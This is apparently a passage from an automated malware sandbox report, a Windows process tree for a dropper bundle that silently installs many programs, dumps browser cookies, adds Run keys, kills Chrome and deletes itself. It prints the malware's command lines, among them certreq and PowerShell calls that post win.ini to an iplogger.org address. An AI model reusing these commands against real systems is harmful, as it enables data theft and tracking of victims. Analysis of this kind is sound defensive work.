11⤵
- Drops file in Windows directory
PID:5692

C:\Users\Admin\AppData\Local\Temp\is-RMJC3.tmp\PictureLAb.exe
"C:\Users\Admin\AppData\Local\Temp\is-RMJC3.tmp\PictureLAb.exe" /Verysilent
12⤵
PID:7724

C:\Users\Admin\AppData\Local\Temp\is-38L0B.tmp\PictureLAb.tmp
"C:\Users\Admin\AppData\Local\Temp\is-38L0B.tmp\PictureLAb.tmp" /SL5="$30784,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-RMJC3.tmp\PictureLAb.exe" /Verysilent
13⤵
PID:4360

C:\Users\Admin\AppData\Local\Temp\is-EOQB9.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-EOQB9.tmp\Setup.exe" /VERYSILENT
14⤵
PID:7760

C:\Users\Admin\AppData\Local\Temp\is-PV8UC.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-PV8UC.tmp\Setup.tmp" /SL5="$40744,442598,358912,C:\Users\Admin\AppData\Local\Temp\is-EOQB9.tmp\Setup.exe" /VERYSILENT
15⤵
PID:7692

C:\Users\Admin\AppData\Local\Temp\is-INOCK.tmp\kkkk.exe
"C:\Users\Admin\AppData\Local\Temp\is-INOCK.tmp\kkkk.exe" /S /UID=lab214
16⤵
- Drops file in Drivers directory
PID:4692

C:\Users\Admin\AppData\Local\Temp\f4-2a4f8-b81-8cba3-0e8a0374c2c43\SHuraepaepesu.exe
"C:\Users\Admin\AppData\Local\Temp\f4-2a4f8-b81-8cba3-0e8a0374c2c43\SHuraepaepesu.exe"
17⤵
PID:7076

C:\Users\Admin\AppData\Local\Temp\is-RMJC3.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-RMJC3.tmp\Delta.exe" /Verysilent
12⤵
PID:7324

C:\Users\Admin\AppData\Local\Temp\is-IHCDU.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-IHCDU.tmp\Delta.tmp" /SL5="$40784,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-RMJC3.tmp\Delta.exe" /Verysilent
13⤵
PID:7880

C:\Users\Admin\AppData\Local\Temp\is-FKR5A.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-FKR5A.tmp\Setup.exe" /VERYSILENT
14⤵
PID:3168

C:\Users\Admin\AppData\Local\Temp\is-RMJC3.tmp\zznote.exe
"C:\Users\Admin\AppData\Local\Temp\is-RMJC3.tmp\zznote.exe" /Verysilent
12⤵
PID:6532

C:\Users\Admin\AppData\Local\Temp\is-S0114.tmp\zznote.tmp
"C:\Users\Admin\AppData\Local\Temp\is-S0114.tmp\zznote.tmp" /SL5="$50784,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-RMJC3.tmp\zznote.exe" /Verysilent
13⤵
PID:7364

C:\Users\Admin\AppData\Local\Temp\is-IFAMR.tmp\jg4_4jaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-IFAMR.tmp\jg4_4jaa.exe" /silent
14⤵
- Checks whether UAC is enabled
PID:2140

C:\Users\Admin\AppData\Local\Temp\is-RMJC3.tmp\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-RMJC3.tmp\hjjgaa.exe" /Verysilent
12⤵
PID:8436

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
13⤵
PID:8556

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
13⤵
PID:8508

C:\Users\Admin\AppData\Local\Temp\rhvu0cqoeqy\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\rhvu0cqoeqy\chashepro3.exe" /VERYSILENT
8⤵
PID:7612

C:\Users\Admin\AppData\Local\Temp\is-NCHHR.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-NCHHR.tmp\chashepro3.tmp" /SL5="$20774,1446038,58368,C:\Users\Admin\AppData\Local\Temp\rhvu0cqoeqy\chashepro3.exe" /VERYSILENT
9⤵
- Drops file in Program Files directory
PID:7876

C:\Program Files (x86)\JCleaner\whiterauf.exe
"C:\Program Files (x86)\JCleaner\whiterauf.exe"
10⤵
- Suspicious use of SetThreadContext
PID:3596

C:\Program Files (x86)\JCleaner\whiterauf.exe
"{path}"
11⤵
PID:7384

C:\Program Files (x86)\JCleaner\Venita.exe
"C:\Program Files (x86)\JCleaner\Venita.exe"
10⤵
- Suspicious use of SetThreadContext
PID:8008

C:\Program Files (x86)\JCleaner\Venita.exe
"{path}"
11⤵
PID:7828

C:\Program Files (x86)\JCleaner\Abbas.exe
"C:\Program Files (x86)\JCleaner\Abbas.exe"
10⤵
PID:8160

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"
10⤵
- Blocklisted process makes network request
- Drops file in System32 directory
PID:7908

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1aSny7"
10⤵
- Checks computer location settings
PID:3660

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
10⤵
PID:5548

C:\Windows\SysWOW64\certreq.exe
certreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
11⤵
PID:7428

C:\Program Files (x86)\JCleaner\5.exe
"C:\Program Files (x86)\JCleaner\5.exe"
10⤵
PID:4092

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Program Files (x86)\JCleaner\5.exe"
11⤵
PID:7468

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
12⤵
- Delays execution with timeout.exe
PID:8040

C:\Users\Admin\AppData\Local\Temp\svvb12451av\vic00ieg0ct.exe
"C:\Users\Admin\AppData\Local\Temp\svvb12451av\vic00ieg0ct.exe" /ustwo INSTALL
8⤵
PID:6032

C:\Users\Admin\AppData\Local\Temp\1belrjyc300\safebits.exe
"C:\Users\Admin\AppData\Local\Temp\1belrjyc300\safebits.exe" /S /pubid=1 /subid=451
8⤵
PID:9072

C:\Users\Admin\AppData\Local\Temp\wfml2whc5lw\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\wfml2whc5lw\Setup3310.exe" /Verysilent /subid=577
8⤵
PID:9180

C:\Users\Admin\AppData\Local\Temp\is-5TQBS.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5TQBS.tmp\Setup3310.tmp" /SL5="$108C6,802346,56832,C:\Users\Admin\AppData\Local\Temp\wfml2whc5lw\Setup3310.exe" /Verysilent /subid=577
9⤵
PID:8540

C:\Users\Admin\AppData\Local\Temp\is-VSK2E.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-VSK2E.tmp\Setup.exe" /Verysilent
10⤵
PID:5484

C:\Users\Admin\AppData\Local\Temp\is-1MIJQ.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-1MIJQ.tmp\Setup.tmp" /SL5="$4093E,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-VSK2E.tmp\Setup.exe" /Verysilent
11⤵
- Drops file in Windows directory
PID:8332

C:\Users\Admin\AppData\Local\Temp\is-2QIC6.tmp\PictureLAb.exe
"C:\Users\Admin\AppData\Local\Temp\is-2QIC6.tmp\PictureLAb.exe" /Verysilent
12⤵
PID:3176

C:\Users\Admin\AppData\Local\Temp\is-EFS9A.tmp\PictureLAb.tmp
"C:\Users\Admin\AppData\Local\Temp\is-EFS9A.tmp\PictureLAb.tmp" /SL5="$209DC,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-2QIC6.tmp\PictureLAb.exe" /Verysilent
13⤵
PID:7576

C:\Users\Admin\AppData\Local\Temp\is-H15PV.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-H15PV.tmp\Setup.exe" /VERYSILENT
14⤵
PID:4548

C:\Users\Admin\AppData\Local\Temp\is-N8SRS.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-N8SRS.tmp\Setup.tmp" /SL5="$40902,442598,358912,C:\Users\Admin\AppData\Local\Temp\is-H15PV.tmp\Setup.exe" /VERYSILENT
15⤵
PID:8376

C:\Users\Admin\AppData\Local\Temp\is-F181S.tmp\kkkk.exe
"C:\Users\Admin\AppData\Local\Temp\is-F181S.tmp\kkkk.exe" /S /UID=lab214
16⤵
PID:2736

C:\Users\Admin\AppData\Local\Temp\15-67993-269-2d9b6-b8df46051c078\Wycetenyxe.exe
"C:\Users\Admin\AppData\Local\Temp\15-67993-269-2d9b6-b8df46051c078\Wycetenyxe.exe"
17⤵
PID:8884

C:\Users\Admin\AppData\Local\Temp\is-2QIC6.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-2QIC6.tmp\Delta.exe" /Verysilent
12⤵
PID:8684

C:\Users\Admin\AppData\Local\Temp\is-LDB0T.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-LDB0T.tmp\Delta.tmp" /SL5="$509B0,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-2QIC6.tmp\Delta.exe" /Verysilent
13⤵
PID:8312

C:\Users\Admin\AppData\Local\Temp\is-70KDB.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-70KDB.tmp\Setup.exe" /VERYSILENT
14⤵
PID:8620

C:\Users\Admin\AppData\Local\Temp\is-2QIC6.tmp\zznote.exe
"C:\Users\Admin\AppData\Local\Temp\is-2QIC6.tmp\zznote.exe" /Verysilent
12⤵
PID:8000

C:\Users\Admin\AppData\Local\Temp\is-CMGV9.tmp\zznote.tmp
"C:\Users\Admin\AppData\Local\Temp\is-CMGV9.tmp\zznote.tmp" /SL5="$609B0,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-2QIC6.tmp\zznote.exe" /Verysilent
13⤵
PID:8868

C:\Users\Admin\AppData\Local\Temp\is-KCO17.tmp\jg4_4jaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-KCO17.tmp\jg4_4jaa.exe" /silent
14⤵
PID:7560

C:\Users\Admin\AppData\Local\Temp\3kosu4yfhfz\vict.exe
"C:\Users\Admin\AppData\Local\Temp\3kosu4yfhfz\vict.exe" /VERYSILENT /id=535
8⤵
PID:4148

C:\Users\Admin\AppData\Local\Temp\is-6I9RN.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-6I9RN.tmp\vict.tmp" /SL5="$108D0,870426,780800,C:\Users\Admin\AppData\Local\Temp\3kosu4yfhfz\vict.exe" /VERYSILENT /id=535
9⤵
- Drops file in Program Files directory
PID:9008

C:\Users\Admin\AppData\Local\Temp\is-20K68.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-20K68.tmp\wimapi.exe" 535
10⤵
PID:8660

C:\Users\Admin\AppData\Local\Temp\4nyqetci4zv\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\4nyqetci4zv\askinstall24.exe"
8⤵
PID:9188

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
9⤵
PID:8520

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
10⤵
- Kills process with taskkill
PID:8096

C:\Users\Admin\AppData\Local\Temp\xbhmjmwna1h\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\xbhmjmwna1h\chashepro3.exe" /VERYSILENT
8⤵
PID:8444

C:\Users\Admin\AppData\Local\Temp\is-TVQA5.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-TVQA5.tmp\chashepro3.tmp" /SL5="$2099A,1446038,58368,C:\Users\Admin\AppData\Local\Temp\xbhmjmwna1h\chashepro3.exe" /VERYSILENT
9⤵
- Drops file in Program Files directory
PID:4592

C:\Program Files (x86)\JCleaner\whiterauf.exe
"C:\Program Files (x86)\JCleaner\whiterauf.exe"
10⤵
- Suspicious use of SetThreadContext
PID:7596

C:\Program Files (x86)\JCleaner\whiterauf.exe
"{path}"
11⤵
PID:8048

C:\Program Files (x86)\JCleaner\Venita.exe
"C:\Program Files (x86)\JCleaner\Venita.exe"
10⤵
- Suspicious use of SetThreadContext
PID:8784

C:\Program Files (x86)\JCleaner\Venita.exe
"{path}"
11⤵
- Drops file in Drivers directory
PID:2736

C:\Program Files (x86)\JCleaner\Abbas.exe
"C:\Program Files (x86)\JCleaner\Abbas.exe"
10⤵
PID:8656

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"
10⤵
- Blocklisted process makes network request
- Drops file in System32 directory
PID:8648

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1aSny7"
10⤵
- Checks computer location settings
PID:8232

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
10⤵
PID:2420

C:\Windows\SysWOW64\certreq.exe
certreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
11⤵
PID:7976

C:\Program Files (x86)\JCleaner\5.exe
"C:\Program Files (x86)\JCleaner\5.exe"
10⤵
PID:1572

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Program Files (x86)\JCleaner\5.exe"
11⤵
PID:6184

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
12⤵
- Delays execution with timeout.exe
PID:8752

C:\Users\Admin\AppData\Local\Temp\ubu2j1zcrpx\pdm3ux3z2kp.exe
"C:\Users\Admin\AppData\Local\Temp\ubu2j1zcrpx\pdm3ux3z2kp.exe" /ustwo INSTALL
8⤵
PID:1248

C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"
4⤵
- Executes dropped EXE
PID:804

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
5⤵
PID:1160

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
6⤵
- Kills process with taskkill
PID:3464

C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"
4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:3796

C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"
4⤵
- Executes dropped EXE
PID:3820

C:\ProgramData\1214703.13
"C:\ProgramData\1214703.13"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3920

C:\ProgramData\7169117.78
"C:\ProgramData\7169117.78"
5⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2824

C:\ProgramData\Windows Host\Windows Host.exe
"C:\ProgramData\Windows Host\Windows Host.exe"
6⤵
- Executes dropped EXE
PID:2968

C:\ProgramData\1371867.15
"C:\ProgramData\1371867.15"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3900

C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4056

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Executes dropped EXE
PID:4180

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4392

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:6092

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:8840

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:2112

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 037B354B57EEC6D4AFCBF96B689053AA C
2⤵
- Loads dropped DLL
PID:200

C:\Users\Admin\AppData\Local\Temp\is-H0OKQ.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-H0OKQ.tmp\chashepro3.tmp" /SL5="$102B4,1446038,58368,C:\Users\Admin\AppData\Local\Temp\hkkckggdkqr\chashepro3.exe" /VERYSILENT
1⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1920

C:\Program Files (x86)\JCleaner\whiterauf.exe
"C:\Program Files (x86)\JCleaner\whiterauf.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3584

C:\Program Files (x86)\JCleaner\whiterauf.exe
"{path}"
3⤵
PID:6844

C:\Program Files (x86)\JCleaner\Venita.exe
"C:\Program Files (x86)\JCleaner\Venita.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:68

C:\Program Files (x86)\JCleaner\Venita.exe
"{path}"
3⤵
PID:6480

C:\Program Files (x86)\JCleaner\Abbas.exe
"C:\Program Files (x86)\JCleaner\Abbas.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:668

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"
2⤵
- Blocklisted process makes network request
- Drops file in System32 directory
PID:3740

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1aSny7"
2⤵
- Checks computer location settings
PID:2000

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
2⤵
PID:4412

C:\Windows\SysWOW64\certreq.exe
certreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
3⤵
PID:4712

C:\Program Files (x86)\JCleaner\5.exe
"C:\Program Files (x86)\JCleaner\5.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4300

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Program Files (x86)\JCleaner\5.exe"
3⤵
PID:5880

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:4720

C:\Users\Admin\AppData\Local\Temp\is-V6SGC.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-V6SGC.tmp\Setup3310.tmp" /SL5="$102B2,802346,56832,C:\Users\Admin\AppData\Local\Temp\nc4j5fr1lb4\Setup3310.exe" /Verysilent /subid=577
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4188

C:\Users\Admin\AppData\Local\Temp\is-7J4AR.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-7J4AR.tmp\Setup.exe" /Verysilent
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5356

C:\Users\Admin\AppData\Local\Temp\is-TI9AI.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-TI9AI.tmp\Setup.tmp" /SL5="$4025A,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-7J4AR.tmp\Setup.exe" /Verysilent
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:5420

C:\Users\Admin\AppData\Local\Temp\is-VS6JC.tmp\PictureLAb.exe
"C:\Users\Admin\AppData\Local\Temp\is-VS6JC.tmp\PictureLAb.exe" /Verysilent
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1196

C:\Users\Admin\AppData\Local\Temp\is-6BNFR.tmp\PictureLAb.tmp
"C:\Users\Admin\AppData\Local\Temp\is-6BNFR.tmp\PictureLAb.tmp" /SL5="$2049E,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-VS6JC.tmp\PictureLAb.exe" /Verysilent
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:4212

C:\Users\Admin\AppData\Local\Temp\is-VCAM7.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-VCAM7.tmp\Setup.exe" /VERYSILENT
6⤵
- Suspicious use of SetWindowsHookEx
PID:6128

C:\Users\Admin\AppData\Local\Temp\is-7A6OT.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-7A6OT.tmp\Setup.tmp" /SL5="$1053C,442598,358912,C:\Users\Admin\AppData\Local\Temp\is-VCAM7.tmp\Setup.exe" /VERYSILENT
7⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:5276

C:\Users\Admin\AppData\Local\Temp\is-4JEOE.tmp\kkkk.exe
"C:\Users\Admin\AppData\Local\Temp\is-4JEOE.tmp\kkkk.exe" /S /UID=lab214
8⤵
PID:6508

C:\Program Files\Windows Photo Viewer\CFYEXQADVI\prolab.exe
"C:\Program Files\Windows Photo Viewer\CFYEXQADVI\prolab.exe" /VERYSILENT
9⤵
- Suspicious use of SetWindowsHookEx
PID:6260

C:\Users\Admin\AppData\Local\Temp\is-M989F.tmp\prolab.tmp
"C:\Users\Admin\AppData\Local\Temp\is-M989F.tmp\prolab.tmp" /SL5="$5057C,575243,216576,C:\Program Files\Windows Photo Viewer\CFYEXQADVI\prolab.exe" /VERYSILENT
10⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:6356

C:\Users\Admin\AppData\Local\Temp\d8-3c7f2-b9e-17da8-52105a0d05ca7\Lasuveloja.exe
"C:\Users\Admin\AppData\Local\Temp\d8-3c7f2-b9e-17da8-52105a0d05ca7\Lasuveloja.exe"
9⤵
PID:6320

C:\Users\Admin\AppData\Local\Temp\is-VS6JC.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-VS6JC.tmp\Delta.exe" /Verysilent
4⤵
- Suspicious use of SetWindowsHookEx
PID:5828

C:\Users\Admin\AppData\Local\Temp\is-GKJ41.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GKJ41.tmp\Delta.tmp" /SL5="$3049E,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-VS6JC.tmp\Delta.exe" /Verysilent
5⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:5632

C:\Users\Admin\AppData\Local\Temp\is-8OTI9.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-8OTI9.tmp\Setup.exe" /VERYSILENT
6⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:2376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2376 -s 960
7⤵
- Program crash
PID:1132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2376 -s 964
7⤵
- Program crash
PID:6292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2376 -s 1092
7⤵
- Program crash
PID:6444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2376 -s 1180
7⤵
- Program crash
PID:6716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2376 -s 1192
7⤵
- Program crash
PID:6936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2376 -s 1240
7⤵
- Program crash
PID:6168

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2376 -s 1516
7⤵
- Program crash
PID:2524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2376 -s 1552
7⤵
- Program crash
PID:6708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2376 -s 1768
7⤵
- Program crash
PID:6512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2376 -s 1740
7⤵
- Program crash
PID:1516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2376 -s 1708
7⤵
- Program crash
PID:6500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2376 -s 1596
7⤵
- Program crash
PID:6608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2376 -s 1792
7⤵
- Program crash
PID:5748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2376 -s 1680
7⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:6488

C:\Users\Admin\AppData\Local\Temp\is-VS6JC.tmp\zznote.exe
"C:\Users\Admin\AppData\Local\Temp\is-VS6JC.tmp\zznote.exe" /Verysilent
4⤵
- Suspicious use of SetWindowsHookEx
PID:5320

C:\Users\Admin\AppData\Local\Temp\is-M6SUN.tmp\zznote.tmp
"C:\Users\Admin\AppData\Local\Temp\is-M6SUN.tmp\zznote.tmp" /SL5="$304A0,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-VS6JC.tmp\zznote.exe" /Verysilent
5⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:3340

C:\Users\Admin\AppData\Local\Temp\is-HDULM.tmp\jg4_4jaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-HDULM.tmp\jg4_4jaa.exe" /silent
6⤵
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
PID:7128

C:\Users\Admin\AppData\Local\Temp\is-VS6JC.tmp\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-VS6JC.tmp\hjjgaa.exe" /Verysilent
4⤵
- Suspicious use of SetWindowsHookEx
PID:6516

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Suspicious use of SetWindowsHookEx
PID:6364

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Suspicious use of SetWindowsHookEx
PID:6524

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:7956

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5980

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:6036

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:5688

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:5628

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4912

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
